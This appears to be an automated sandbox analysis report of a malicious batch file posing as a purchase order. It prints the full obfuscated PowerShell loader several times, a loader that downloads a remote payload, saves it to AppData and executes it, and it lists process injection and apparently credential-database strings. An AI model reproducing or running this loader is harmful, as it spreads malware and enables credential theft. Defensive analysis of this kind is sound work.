              Source: powershell.exe, 00000002.00000002.2485251498.0000020B748C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: osoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msilIndbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF.)La '
              Source: powershell.exe, 00000002.00000002.2485251498.0000020B748C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2196688153.0000000002B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.hFe Kd$,iGtieFur KmNoaFonWai.ueKusF
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5CFCA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievasemtE,-,iPDuaF.tG.h
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5CFF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HostApplication=powershell.exe -windowstyle hidden If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na ia TrPerBeaHunPld.eeSan.e4Re= I(KoT ievase
              Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winBAT@50/20@15/11
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,17_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,19_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,17_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,17_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,17_2_0040B58D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Negligent.GasJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\shietgtst-TYE3VH
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55kirasc.kll.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7616
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7860
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5288
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8084
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000A.00000002.4244231504.0000000023E10000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 00000011.00000002.2267503862.0000000003640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_18-32948
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily 